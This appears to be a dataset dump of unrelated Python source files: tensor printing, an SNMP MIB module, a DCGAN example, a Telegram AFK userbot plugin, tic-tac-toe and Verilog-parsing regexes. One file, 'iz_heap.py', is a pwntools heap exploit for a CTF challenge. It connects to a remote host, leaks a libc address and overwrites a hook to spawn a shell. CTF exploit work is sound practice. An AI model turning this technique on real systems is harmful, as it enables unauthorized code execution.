("{{:{}.{}e}}")
.format(self.max_width, PRINT_OPTS.precision)
.format(value)
)
elif self.int_mode:
ret = "{:.0f}".format(value)
if not (math.isinf(value) or math.isnan(value)):
ret += "."
else:
ret = ("{{:.{}f}}").format(PRINT_OPTS.precision).format(value)
else:
ret = "{}".format(value)
return (self.max_width - len(ret)) * " " + ret
def _scalar_str(self, formatter1):
return formatter1.format(_try_convert_to_local_tensor(self).tolist())
def _vector_str(self, indent, summarize, formatter1):
# length includes spaces and comma between elements
element_length = formatter1.width() + 2
elements_per_line = max(
1, int(math.floor((PRINT_OPTS.linewidth - indent) / (element_length)))
)
char_per_line = element_length * elements_per_line
def _val_formatter(val, formatter1=formatter1):
return formatter1.format(val)
if summarize and self.size(0) > 2 * PRINT_OPTS.edgeitems:
left_values = _try_convert_to_local_tensor(
self[: PRINT_OPTS.edgeitems]
).tolist()
right_values = _try_convert_to_local_tensor(
self[-PRINT_OPTS.edgeitems :]
).tolist()
data = (
[_val_formatter(val) for val in left_values]
+ [" ..."]
+ [_val_formatter(val) for val in right_values]
)
else:
values = _try_convert_to_local_tensor(self).tolist()
data = [_val_formatter(val) for val in values]
data_lines = [
data[i : i + elements_per_line] for i in range(0, len(data), elements_per_line)
]
lines = [", ".join(line) for line in data_lines]
return "[" + ("," + "\n" + " " * (indent + 1)).join(lines) + "]"
def _tensor_str_with_formatter(self, indent, summarize, formatter1):
dim = self.dim()
if dim == 0:
return _scalar_str(self, formatter1)
if dim == 1:
return _vector_str(self, indent, summarize, formatter1)
if summarize and self.size(0) > 2 * PRINT_OPTS.edgeitems:
slices = (
[
_tensor_str_with_formatter(self[i], indent + 1, summarize, formatter1)
for i in range(0, PRINT_OPTS.edgeitems)
]
+ ["..."]
+ [
_tensor_str_with_formatter(self[i], indent + 1, summarize, formatter1)
for i in range(self.shape[0] - PRINT_OPTS.edgeitems, self.shape[0])
]
)
else:
slices = [
_tensor_str_with_formatter(self[i], indent + 1, summarize, formatter1)
for i in range(0, self.size(0))
]
tensor_str = ("," + "\n" * (dim - 1) + " " * (indent + 1)).join(slices)
return "[" + tensor_str + "]"
def _tensor_str(self, indent):
summarize = self.numel() > PRINT_OPTS.threshold
if self.dtype is flow.float16:
self = self.float()
# TODO: not support flow.sbp.split(x) but flow.sbp.split(0).
def _cannot_print(sbp):
return (
sbp != flow.sbp.partial_sum
and sbp != flow.sbp.broadcast
and sbp != flow.sbp.split(0)
)
# TODO: delete it when boxing on "CPU" and s1->b on "GPU" are ready
if self.is_consistent:
self = self.to("cuda")
if all(_cannot_print(sbp) for sbp in self.sbp):
return "[...]"
with flow.no_grad():
formatter = _Formatter(get_summarized_data(self) if summarize else self)
return _tensor_str_with_formatter(self, indent, summarize, formatter)
def _add_suffixes(tensor_str, suffixes, indent):
tensor_strs = [tensor_str]
last_line_len = len(tensor_str) - tensor_str.rfind("\n") + 1
for suffix in suffixes:
suffix_len = len(suffix)
if last_line_len + suffix_len + 2 > PRINT_OPTS.linewidth:
tensor_strs.append(",\n" + " " * indent + suffix)
last_line_len = indent + suffix_len
else:
tensor_strs.append(", " + suffix)
last_line_len += suffix_len + 2
tensor_strs.append(")")
return "".join(tensor_strs)
def get_summarized_data(self):
dim = self.dim()
if dim == 0:
return self
if dim == 1:
if self.size(0) > 2 * PRINT_OPTS.edgeitems:
return flow.cat(
(self[: PRINT_OPTS.edgeitems], self[-PRINT_OPTS.edgeitems :])
)
else:
return self
if self.size(0) > 2 * PRINT_OPTS.edgeitems:
start = [self[i] for i in range(0, PRINT_OPTS.edgeitems)]
end = [
self[i] for i in range(self.shape[0] - PRINT_OPTS.edgeitems, self.shape[0])
]
return flow.stack([get_summarized_data(x) for x in (start + end)])
else:
return flow.stack([get_summarized_data(x) for x in self])
def _gen_tensor_str_template(tensor, is_meta):
is_meta = is_meta or tensor.is_lazy
prefix = "tensor("
indent = len(prefix)
suffixes = []
# tensor is local or consistent
if tensor.is_consistent:
suffixes.append(f"placement={str(tensor.placement)}")
suffixes.append(f"sbp={str(tensor.sbp)}")
elif tensor.device.type == "cuda" or tensor.device.type == "gpu":
suffixes.append("device='" + str(tensor.device) + "'")
elif tensor.device.type != "cpu":
raise RunTimeError("unknow device type")
if tensor.is_lazy:
suffixes.append("is_lazy='True'")
# tensor is empty, meta or normal
if tensor.numel() == 0:
# Explicitly print the shape if it is not (0,), to match NumPy behavior
if tensor.dim() != 1:
suffixes.append("size=" + str(tuple(tensor.shape)))
tensor_str = "[]"
elif is_meta:
tensor_str = "..."
suffixes.append("size=" + str(tuple(tensor.shape)))
else:
tensor_str = _tensor_str(tensor, indent)
suffixes.append("dtype=" + str(tensor.dtype))
if tensor.grad_fn is not None:
name = tensor.grad_fn.name()
suffixes.append("grad_fn=<{}>".format(name))
elif tensor.requires_grad:
suffixes.append("requires_grad=True")
return _add_suffixes(prefix + tensor_str, suffixes, indent)
def _gen_tensor_str(tensor):
return _gen_tensor_str_template(tensor, False)
def _gen_tensor_meta_str(tensor):
# meta
return _gen_tensor_str_template(tensor, True)
| [
"[email protected]"
] | |
0ffe61f0c5fc6dd5c9c0e340692739b892566dc0 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/Juniper-TSM-CONF.py | 71fad16c3643ce9206c5564ee369544ce182b392 | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 3,237 | py | #
# PySNMP MIB module Juniper-TSM-CONF (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Juniper-TSM-CONF
# Produced by pysmi-0.3.4 at Wed May 1 14:04:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion")
juniAgents, = mibBuilder.importSymbols("Juniper-Agents", "juniAgents")
AgentCapabilities, NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "AgentCapabilities", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, MibIdentifier, TimeTicks, NotificationType, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter32, Integer32, Gauge32, Unsigned32, Counter64, Bits, iso = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "MibIdentifier", "TimeTicks", "NotificationType", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter32", "Integer32", "Gauge32", "Unsigned32", "Counter64", "Bits", "iso")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
juniTsmAgent = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 5, 2, 67))
juniTsmAgent.setRevisions(('2003-10-27 22:50',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: juniTsmAgent.setRevisionsDescriptions(('The initial release of this management information module.',))
if mibBuilder.loadTexts: juniTsmAgent.setLastUpdated('200310272250Z')
if mibBuilder.loadTexts: juniTsmAgent.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: juniTsmAgent.setContactInfo(' Juniper Networks, Inc. Postal: 10 Technology Park Drive Westford, MA 01886-3146 USA Tel: +1 978 589 5800 E-mail: [email protected]')
if mibBuilder.loadTexts: juniTsmAgent.setDescription('The agent capabilities definitions for the Terminal Server Management (TSM) component of the SNMP agent in the Juniper E-series family of products.')
juniTsmAgentV1 = AgentCapabilities((1, 3, 6, 1, 4, 1, 4874, 5, 2, 67, 1))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniTsmAgentV1 = juniTsmAgentV1.setProductRelease('Version 1 of the Terminal Server Management (TSM) component of the\n JUNOSe SNMP agent. This version of the TSM component is supported in\n JUNOSe 5.3 and subsequent system releases.')
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
juniTsmAgentV1 = juniTsmAgentV1.setStatus('current')
if mibBuilder.loadTexts: juniTsmAgentV1.setDescription('The MIB supported by the JUNOSe SNMP agent for the TSM application.')
mibBuilder.exportSymbols("Juniper-TSM-CONF", PYSNMP_MODULE_ID=juniTsmAgent, juniTsmAgent=juniTsmAgent, juniTsmAgentV1=juniTsmAgentV1)
| [
"[email protected]"
] | |
501ce999fd6452c28544240627deb50e62312876 | fce83f1b55b8894afab9eb58ae8b4ba2e26eb86b | /examples/GAN/DCGAN.py | e9df6b36319476aea07fd240e26005c998a75385 | [
"Apache-2.0"
] | permissive | PeisenZhao/tensorpack | b65d451f6d4a7fe1af1e183bdc921c912f087586 | 6ca57de47e4a76b57c8aa2f0dad87c1059c13ac0 | refs/heads/master | 2021-05-05T01:46:05.209522 | 2018-01-31T05:29:37 | 2018-01-31T05:29:37 | 119,641,372 | 1 | 0 | null | 2018-01-31T05:52:07 | 2018-01-31T05:52:06 | null | UTF-8 | Python | false | false | 5,554 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: DCGAN.py
# Author: Yuxin Wu <[email protected]>
import glob
import numpy as np
import os
import argparse
from tensorpack import *
from tensorpack.utils.viz import stack_patches
from tensorpack.tfutils.scope_utils import auto_reuse_variable_scope
from tensorpack.utils.globvars import globalns as opt
import tensorflow as tf
from GAN import GANTrainer, RandomZData, GANModelDesc
"""
1. Download the 'aligned&cropped' version of CelebA dataset
from http://mmlab.ie.cuhk.edu.hk/projects/CelebA.html
2. Start training:
./DCGAN-CelebA.py --data /path/to/img_align_celeba/ --crop-size 140
Generated samples will be available through tensorboard
3. Visualize samples with an existing model:
./DCGAN-CelebA.py --load path/to/model --sample
You can also train on other images (just use any directory of jpg files in
`--data`). But you may need to change the preprocessing.
A pretrained model on CelebA is at http://models.tensorpack.com/GAN/
"""
# global vars
opt.SHAPE = 64
opt.BATCH = 128
opt.Z_DIM = 100
class Model(GANModelDesc):
def _get_inputs(self):
return [InputDesc(tf.float32, (None, opt.SHAPE, opt.SHAPE, 3), 'input')]
def generator(self, z):
""" return an image generated from z"""
nf = 64
l = FullyConnected('fc0', z, nf * 8 * 4 * 4, nl=tf.identity)
l = tf.reshape(l, [-1, 4, 4, nf * 8])
l = BNReLU(l)
with argscope(Deconv2D, nl=BNReLU, kernel_shape=4, stride=2):
l = Deconv2D('deconv1', l, nf * 4)
l = Deconv2D('deconv2', l, nf * 2)
l = Deconv2D('deconv3', l, nf)
l = Deconv2D('deconv4', l, 3, nl=tf.identity)
l = tf.tanh(l, name='gen')
return l
@auto_reuse_variable_scope
def discriminator(self, imgs):
""" return a (b, 1) logits"""
nf = 64
with argscope(Conv2D, nl=tf.identity, kernel_shape=4, stride=2):
l = (LinearWrap(imgs)
.Conv2D('conv0', nf, nl=tf.nn.leaky_relu)
.Conv2D('conv1', nf * 2)
.BatchNorm('bn1')
.tf.nn.leaky_relu()
.Conv2D('conv2', nf * 4)
.BatchNorm('bn2')
.tf.nn.leaky_relu()
.Conv2D('conv3', nf * 8)
.BatchNorm('bn3')
.tf.nn.leaky_relu()
.FullyConnected('fct', 1, nl=tf.identity)())
return l
def _build_graph(self, inputs):
image_pos = inputs[0]
image_pos = image_pos / 128.0 - 1
z = tf.random_uniform([opt.BATCH, opt.Z_DIM], -1, 1, name='z_train')
z = tf.placeholder_with_default(z, [None, opt.Z_DIM], name='z')
with argscope([Conv2D, Deconv2D, FullyConnected],
W_init=tf.truncated_normal_initializer(stddev=0.02)):
with tf.variable_scope('gen'):
image_gen = self.generator(z)
tf.summary.image('generated-samples', image_gen, max_outputs=30)
with tf.variable_scope('discrim'):
vecpos = self.discriminator(image_pos)
vecneg = self.discriminator(image_gen)
self.build_losses(vecpos, vecneg)
self.collect_variables()
def _get_optimizer(self):
lr = tf.get_variable('learning_rate', initializer=2e-4, trainable=False)
return tf.train.AdamOptimizer(lr, beta1=0.5, epsilon=1e-3)
def get_augmentors():
augs = []
if opt.load_size:
augs.append(imgaug.Resize(opt.load_size))
if opt.crop_size:
augs.append(imgaug.CenterCrop(opt.crop_size))
augs.append(imgaug.Resize(opt.SHAPE))
return augs
def get_data(datadir):
imgs = glob.glob(datadir + '/*.jpg')
ds = ImageFromFile(imgs, channel=3, shuffle=True)
ds = AugmentImageComponent(ds, get_augmentors())
ds = BatchData(ds, opt.BATCH)
ds = PrefetchDataZMQ(ds, 5)
return ds
def sample(model, model_path, output_name='gen/gen'):
pred = PredictConfig(
session_init=get_model_loader(model_path),
model=model,
input_names=['z'],
output_names=[output_name, 'z'])
pred = SimpleDatasetPredictor(pred, RandomZData((100, opt.Z_DIM)))
for o in pred.get_result():
o = o[0] + 1
o = o * 128.0
o = np.clip(o, 0, 255)
o = o[:, :, :, ::-1]
stack_patches(o, nr_row=10, nr_col=10, viz=True)
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
parser.add_argument('--sample', action='store_true', help='view generated examples')
parser.add_argument('--data', help='a jpeg directory')
parser.add_argument('--load-size', help='size to load the original images', type=int)
parser.add_argument('--crop-size', help='crop the original images', type=int)
args = parser.parse_args()
opt.use_argument(args)
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
return args
if __name__ == '__main__':
args = get_args()
if args.sample:
sample(Model(), args.load)
else:
assert args.data
logger.auto_set_dir()
GANTrainer(
input=QueueInput(get_data(args.data)),
model=Model()).train_with_defaults(
callbacks=[ModelSaver()],
steps_per_epoch=300,
max_epoch=200,
session_init=SaverRestore(args.load) if args.load else None
)
| [
"[email protected]"
] | |
483db4217063a3ca57b15543b683ac4c80e5c4ee | d47ed9550468b360a54a4fe8e3cfe63bf15c1ddb | /ProgrammingPython/Preview/initdata.py | c53957abef9ca1ef665ef5ac0b238760cdf7d094 | [] | no_license | yuzuqiang/learnPython | 880bb1e5d40a7a4d928068ae892e9b85f84ec355 | 490c8ccf3a61b967641ec47e2f549574fe9a2fa0 | refs/heads/master | 2021-01-13T03:47:36.611964 | 2017-01-01T18:24:23 | 2017-01-01T18:24:23 | 77,197,546 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 356 | py | #Record
bob = {'name': 'Bob Smith', 'age': 42, 'pay': 30000, 'job': 'dev'}
sue = {'name': 'Sue Jones', 'age': 45, 'pay': 40000, 'job': 'hdw'}
tom = {'name': 'Tom', 'age': 50, 'pay': 0, 'job': None}
#Database
db = {}
db['bob'] = bob
db['sue'] = sue
db['tom'] = tom
#As shell run
if __name__=='__main__':
for key in db:
print(key, '=>\n', db[key])
| [
"[email protected]"
] | |
35889e57cfde9a2d0c586a094664618e9a1813af | 1b23f77f8a615ff563e9b9b6ad0da93dfa3ad8d6 | /afk.py | 8cfe0868c82112813d7cbdacfa94a16983708b6a | [
"MIT"
] | permissive | Dark-PRINCESS/Dark-PRINCESS- | 14a8d7fc81374bfbdc37241c72f7b87d97f32ad5 | 0ad9c67960c8f88745442d264fdcd113b9925807 | refs/heads/main | 2023-01-24T09:16:27.018838 | 2020-11-14T10:52:00 | 2020-11-14T10:52:00 | 306,575,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,483 | py | """AFK Plugin for Friday
Syntax: .afk REASON"""
import asyncio
import datetime
from telethon import events
from telethon.tl import functions, types
from userbot.utils import admin_cmd
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
USER_AFK = {}
afk_time = None
last_afk_message = {}
@borg.on(events.NewMessage(outgoing=True)) # pylint:disable=E0602
async def set_not_afk(event):
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
current_message = event.message.message
if ".afk" not in current_message and "yes" in USER_AFK: # pylint:disable=E0602
try:
await borg.send_message( # pylint:disable=E0602
Config.PLUGIN_CHANNEL, # pylint:disable=E0602
"#AfkLogger My Boss Went Afk"
)
except Exception as e: # pylint:disable=C0103,W0703
await borg.send_message( # pylint:disable=E0602
event.chat_id,
"Please set `PLUGIN_CHANNEL` " + \
"for the proper functioning of afk functionality " + \
"in @FridayOT\n\n `{}`".format(str(e)),
reply_to=event.message.id,
silent=True
)
USER_AFK = {} # pylint:disable=E0602
afk_time = None # pylint:disable=E0602
@borg.on(admin_cmd(pattern=r"afk ?(.*)"))
async def _(event):
if event.fwd_from:
return
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
global reason
USER_AFK = {}
afk_time = None
last_afk_message = {}
reason = event.pattern_match.group(1)
if not USER_AFK: # pylint:disable=E0602
last_seen_status = await borg( # pylint:disable=E0602
functions.account.GetPrivacyRequest(
types.InputPrivacyKeyStatusTimestamp()
)
)
if isinstance(last_seen_status.rules, types.PrivacyValueAllowAll):
afk_time = datetime.datetime.now() # pylint:disable=E0602
USER_AFK = f"yes: {reason}" # pylint:disable=E0602
if reason:
await event.edit(f"My Mistress Is Going Afk ! And The Reason is {reason}")
else:
await event.edit(f"My Boss is Going")
await asyncio.sleep(5)
await event.delete()
try:
await borg.send_message( # pylint:disable=E0602
Config.PLUGIN_CHANNEL, # pylint:disable=E0602
f"#AfkLogger Reason : {reason}"
)
except Exception as e: # pylint:disable=C0103,W0703
logger.warn(str(e)) # pylint:disable=E0602
@borg.on(events.NewMessage( # pylint:disable=E0602
incoming=True,
func=lambda e: bool(e.mentioned or e.is_private)
))
async def on_afk(event):
if event.fwd_from:
return
global USER_AFK # pylint:disable=E0602
global afk_time # pylint:disable=E0602
global last_afk_message # pylint:disable=E0602
afk_since = "`a while ago`"
current_message_text = event.message.message.lower()
if "afk" in current_message_text:
# userbot's should not reply to other userbot's
# https://core.telegram.org/bots/faq#why-doesn-39t-my-bot-see-messages-from-other-bots
return False
if USER_AFK and not (await event.get_sender()).bot: # pylint:disable=E0602
if afk_time: # pylint:disable=E0602
now = datetime.datetime.now()
datime_since_afk = now - afk_time # pylint:disable=E0602
time = float(datime_since_afk.seconds)
days = time // (24 * 3600)
time = time % (24 * 3600)
hours = time // 3600
time %= 3600
minutes = time // 60
time %= 60
seconds = time
if days == 1:
afk_since = "**Yesterday**"
elif days > 1:
if days > 6:
date = now + \
datetime.timedelta(
days=-days, hours=-hours, minutes=-minutes)
afk_since = date.strftime("%A, %Y %B %m, %H:%I")
else:
wday = now + datetime.timedelta(days=-days)
afk_since = wday.strftime('%A')
elif hours > 1:
afk_since = f"`{int(hours)}h{int(minutes)}m` **ago**"
elif minutes > 0:
afk_since = f"`{int(minutes)}m{int(seconds)}s` **ago**"
else:
afk_since = f"`{int(seconds)}s` **ago**"
msg = None
message_to_reply = f"**My Boss is AFK** ! \n\n**Reason** : `{reason}` \n\n**Afk Since** : {afk_since}" + \
f"\n\n__Kindly Leave A Message__ ! \n`He Will Reply To You Soon !`" \
if reason \
else f"**Hello, Boss Is AFK Right Now And May Be Forgot List Reason ! Any Way He Will Come Back Soon !**"
msg = await event.reply(message_to_reply)
await asyncio.sleep(5)
if event.chat_id in last_afk_message: # pylint:disable=E0602
await last_afk_message[event.chat_id].delete() # pylint:disable=E0602
last_afk_message[event.chat_id] = msg # pylint:disable=E0602
| [
"[email protected]"
] | |
19b16de0ef065f3a8c63d1aa8b0c09605b54ea69 | e44b2754d3cd9dbd7e419c44ca9f2a9efe00cb0b | /tictactoe.py | e93e54a52029b78dfc92ff4aa24629bfd543ef71 | [] | no_license | litannalex/JetBrains-Academy-Projects | 00126a4a9aef505fff79595c60fb9621e2dd74b9 | 896a38cfaee63bf5eaf7d7dcecef2fc1885f59b2 | refs/heads/master | 2022-11-11T09:19:04.019728 | 2020-06-27T00:09:19 | 2020-06-27T00:09:19 | 267,681,774 | 0 | 0 | null | 2020-06-29T17:45:19 | 2020-05-28T19:47:09 | Python | UTF-8 | Python | false | false | 2,863 | py | ROWS = 3
COLUMNS = 3
# takes 2 coordinates for a move,
# returns corresponding 1 coordinate in the list
def coordinate(c, r):
new_c = c - 1
new_r = ROWS - r
return new_r * COLUMNS + new_c
# takes list with symbols, prints out the battlefield
def print_field(l):
print("---------")
for i in range(ROWS):
print("|", " ".join(l[i * ROWS:i * ROWS + COLUMNS]), "|")
print("---------")
# creates the nested list with three-in-a-row combinations
def three_rows(l):
rows = [l[i:COLUMNS*i] for i in range(COLUMNS)]
columns = [l[0:7:3], l[1:8:3], l[2:9:3]]
diagonals = [l[0:9:4], l[2:7:2]]
three = [rows, columns, diagonals]
return three
# game set up: prints out empty fields, creates variable
field_list = list(' ' * 9)
print_field(field_list)
move_counter = 0
game_finished = False
while not game_finished:
# prompts the user to give coordinates for a move until valid
valid_input = False
valid_numbers = ['1', '2', '3']
move = -1
while not valid_input:
move_coordinates = input("Enter the coordinates: ").split()
if len(move_coordinates) != 2:
print("Enter exactly two numbers!")
elif not move_coordinates[0].isnumeric() or not move_coordinates[1].isnumeric():
print("You should enter numbers!")
elif move_coordinates[0] not in valid_numbers or move_coordinates[1] not in valid_numbers:
print("Coordinates should be from 1 to 3!")
else:
col, row = [int(i) for i in move_coordinates]
move = coordinate(col, row)
if field_list[move] not in [' ', '_']:
print("This cell is occupied! Choose another one!")
else:
valid_input = True
move_counter += 1
# writes user's move into the field list and outputs new field
if move_counter % 2 == 1:
field_list[move] = 'X'
else:
field_list[move] = 'O'
print_field(field_list)
# generates three-in-a-row combinations
three_in_a_row = three_rows(field_list)
# checks if input contains empty cells
empty_cells = False
for symbol in field_list:
if symbol in [' ', '_']:
empty_cells = True
# counts 3 in a row combinations for Xs and Os
winning = [['X'] * 3, ['O'] * 3]
x_three, o_three = 0, 0
for element in three_in_a_row:
for i in element:
if i == winning[0]:
x_three += 1
if i == winning[1]:
o_three += 1
# Prints game states
if x_three > 0 and o_three == 0:
print("X wins")
game_finished = True
elif o_three > 0 and x_three == 0:
print("O wins")
game_finished = True
elif (x_three == 0 and o_three ==0) and not empty_cells:
print("Draw")
game_finished = True
| [
"[email protected]"
] | |
289e97211637cfe7a0756c10320768fac5de8148 | f72a0878225776c4c51d6201aeda705c99e197a4 | /rna_transcription.py | bcfda4eba6b499420d1d3f1835135fcf076d0162 | [] | no_license | pnadolny13/exercism_python | f9dbb8ec0df809ef428a9c3141cc7a9539934698 | 26726fb8d1f732dae8b04e61bb6c99df00abbc2c | refs/heads/master | 2021-01-19T20:50:35.160506 | 2017-09-21T16:07:46 | 2017-09-21T16:07:46 | 88,566,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 20 22:42:11 2017
@author: pnadolny
"""
def to_rna(dna):
dna = str.upper(dna);
rna = [];
for i in dna:
if i == "G":
rna.append("C");
elif i == "C":
rna.append("G");
elif i == "T":
rna.append("A");
elif i == "A":
rna.append("U");
else:
rna = [];
break;
rna = ''.join(rna);
return rna; | [
"[email protected]"
] | |
ed6dc456eab11ab5052cb302c87cfbb2ebce405a | e53009b7543a6dff5019dd8f21c9e7488d9daf72 | /2019/ISITDTU Quals/iz_heap.py | 3ec97d74aafa5b1c64c985d868e9f9bc378e27a5 | [] | no_license | hOwD4yS/CTF | ca8546cd0715ce4a3c2ebe5bf3939cc19932d38f | 0ff3de58513cbeb602a475f6add97b51c5574e28 | refs/heads/master | 2021-06-06T18:14:00.884142 | 2021-05-06T08:33:00 | 2021-05-06T08:33:00 | 144,465,413 | 9 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,144 | py | from pwn import *
#p = process("./iz_heap_lv1")
p = remote("165.22.110.249",3333)
def add(size , data):
p.sendlineafter(":","1")
p.sendlineafter(":",str(size))
p.sendafter(":",data)
def edit(idx , size , data):
p.sendlineafter(":","2")
p.sendlineafter(":",str(idx))
p.sendlineafter(":",str(size))
p.sendafter(":",data)
def delete(idx):
p.sendlineafter(":","3")
p.sendlineafter(":",str(idx))
def editname(name):
p.sendlineafter(":","4")
p.sendlineafter(":","Y")
p.sendafter(":",name)
p.sendafter(":",p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x91)+"A"*0x80+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
for i in range(7):
print i
add(0x7f,"A")
for i in range(7):
print i
delete(i)
delete(20)
editname("A"*0x20)
libcbase = u64(p.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x3ebca0
print hex(libcbase)
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+"A"*0x60+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
delete(20)
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+p64(libcbase+0x3ed8e8)+"A"*(0x60-8)+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
add(0x68,"A")
add(0x68,p64(libcbase+0x4f322))
p.interactive()
| [
"[email protected]"
] | |
5c4708a3dc80cafe963aa64187ed32d51dfc890f | 40f9febe33ab1b2aaf8e7b9a965dc4966476ab52 | /models/vision/detection/awsdet/utils/runner/hooks/logger/__init__.py | 2ace40536b0692bc9f7c12b192f427ae1b06c7ac | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | johnbensnyder/deep-learning-models | 770a9257eadb8f1b5bc250f277a45ac8c0eba2e7 | 5b1194a862c026a30d5dfff46979cb7e80869e81 | refs/heads/master | 2022-11-28T11:51:20.326742 | 2020-08-07T22:36:46 | 2020-08-07T22:36:46 | 262,207,411 | 0 | 1 | Apache-2.0 | 2020-05-08T02:26:16 | 2020-05-08T02:26:16 | null | UTF-8 | Python | false | false | 233 | py | # Copyright (c) Open-MMLab. All rights reserved.
from .base import LoggerHook
from .text import TextLoggerHook
from .tensorboard import TensorboardLoggerHook
__all__ = [
'LoggerHook', 'TextLoggerHook', 'TensorboardLoggerHook'
]
| [
"[email protected]"
] | |
a9db9d36ada768fb305ce1f861cf4a50ac70729a | fe8142632f381654a0b7073664c534dfbebb7851 | /ADJUSTABLE2.py | 282adb18887b73f074490de0080b3602609799f9 | [] | no_license | edgelore/Testing_development_over_time_for_creation_of_a_language | 2b4f248fbfed3c20207ff8ae11596073fd216066 | 1ad3ccbd37cc5831ecf1c7a55776592c4cae03f9 | refs/heads/master | 2020-04-13T22:28:07.528334 | 2018-12-29T06:02:11 | 2018-12-29T06:02:11 | 163,480,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 41 | py | ADJUSTABLE2 = "CAPABILITY TO ADJUST"
| [
"[email protected]"
] | |
6ea5d6604909fba4dae2f6fa379bf3062b294799 | f78d8aae7c2e3c5c705b445d252822dffa5d2141 | /app/parse.py | 0399dbeed21272ffe777ee82458b17cb5c44a121 | [
"MIT"
] | permissive | o-alexandre-felipe/verilog-structural-manipulation | bc832ec2e061121ceb82b3441bd410806c785cc5 | d210b415cfa2ef732ba1099c8934b4b4354f2526 | refs/heads/master | 2021-09-08T03:57:14.697822 | 2021-09-03T08:22:07 | 2021-09-03T08:22:07 | 95,001,077 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,841 | py | import re;
module_re = re.compile('\\bmodule\\b.*?\\bendmodule\\b', re.MULTILINE | re.DOTALL);
module_parts_re = re.compile("""
\\bmodule\\b\s*
([a-zA-Z_][a-zA-Z0-9_]*) # module name
\s*(\#\s*\(.*?\))? # parameters are serparated by commas,
# the port list is separated with spaces
\s*\((.*?)\)\s*; # module port list
(.*?) # module body
\\bendmodule\\b
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
comments = re.compile('//.*?$|/\*.*?\*', re.MULTILINE | re.DOTALL | re.VERBOSE)
instance_re = re.compile("""
(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # module name
\s*(\#\s*\(.*?\))? # parameter list this works only because of the ';' separating each instance
\s*?(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # instance name
\s*?[(](.*?)[)]\s*; # port connections""", re.MULTILINE | re.DOTALL | re.VERBOSE)
""" Capture signal declarations
<s> name;
s [.:.] name;
"""
signal_re = lambda s, sep = ';': re.compile("""
((\\b%s\\b)\s*(\\[.*?:.*?\\])?\s*?(\\b[_a-zA-Z].*?\\b)\s*)%s
""" % (s, sep), re.MULTILINE | re.DOTALL | re.VERBOSE);
""" Capture different forms of parameter
parameter name = <>
parameter <type> name = <>
parameter <type> [range] name = <>
type is restricted to lowercase words. """
parameter_re = re.compile("""
parameter
\\b\s*?(?:[a-z]*?) # type
(?:\s*\[.*?\])?\s*? # range
(\\b[_A-Za-z].*?\\b)\s* # name
\\=\s*([^,;]*) # value
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
v95 = False;
input_re = signal_re('input\\b\\s*(?:\\bwire\\b)?', '[;,]');
output_re = signal_re('output\\b\\s*(?:\\bwire\\b)?','[;,]');
inout_re = signal_re('inout\\b\\s*(?:\\bwire\\b)?', '[;,]');
